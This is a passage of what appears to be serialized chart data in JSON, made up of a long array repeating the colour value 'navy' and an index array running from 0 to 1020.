,\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,600,601,602,603,604,605,606,607,608,609,610,611,612,613,614,615,616,617,618,619,620,621,622,623,624,625,626,627,628,629,630,631,632,633,634,635,636,637,638,639,640,641,642,643,644,645,646,647,648,649,650,651,652,653,654,655,656,657,658,659,660,661,662,663,664,665,666,667,668,669,670,671,672,673,674,675,676,677,678,679,680,681,682,683,684,685,686,687,688,689,690,691,692,693,694,695,696,697,698,699,700,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,731,732,733,734,735,736,737,738,739,740,741,742,743,744,745,746,747,748,749,750,751,752,753,754,755,756,757,758,759,760,761,762,763,764,765,766,767,768,769,770,771,772,773,774,775,776,777,778,779,780,781,782,783,784,785,786,787,788,789,790,791,792,793,794,795,796,797,798,799,800,801,802,803,804,805,806,807,808,809,810,811,812,813,814,815,816,817,818,819,820,821,822,823,824,825,826,827,828,829,830,831,832,833,834,835,836,837,838,839,840,841,842,843,844,845,846,847,848,849,850,851,852,853,854,855,856,857,858,859,860,861,862,863,864,865,866,867,868,869,870,871,872,873,874,875,876,877,878,879,880,881,882,883,884,885,886,887,888,889,890,891,892,893,894,895,896,897,898,899,900,901,902,903,904,905,906,907,908,909,910,911,912,913,914,915,916,917,918,919,920,921,922,923,924,925,926,927,928,929,930,931,932,933,934,935,936,937,938,939,940,941,942,943,944,945,946,947,948,949,950,951,952,953,954,955,956,957,958,959,960,961,962,963,964,965,966,967,968,969,970,971,972,973,974,975,976,977,978,979,980,981,982,983,984,985,986,987,988,989,990,991,992,993,994,995,996,997,998,999,1000,1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,1011,1012,1013,1014,1015,1016,1017,1018,1019,1020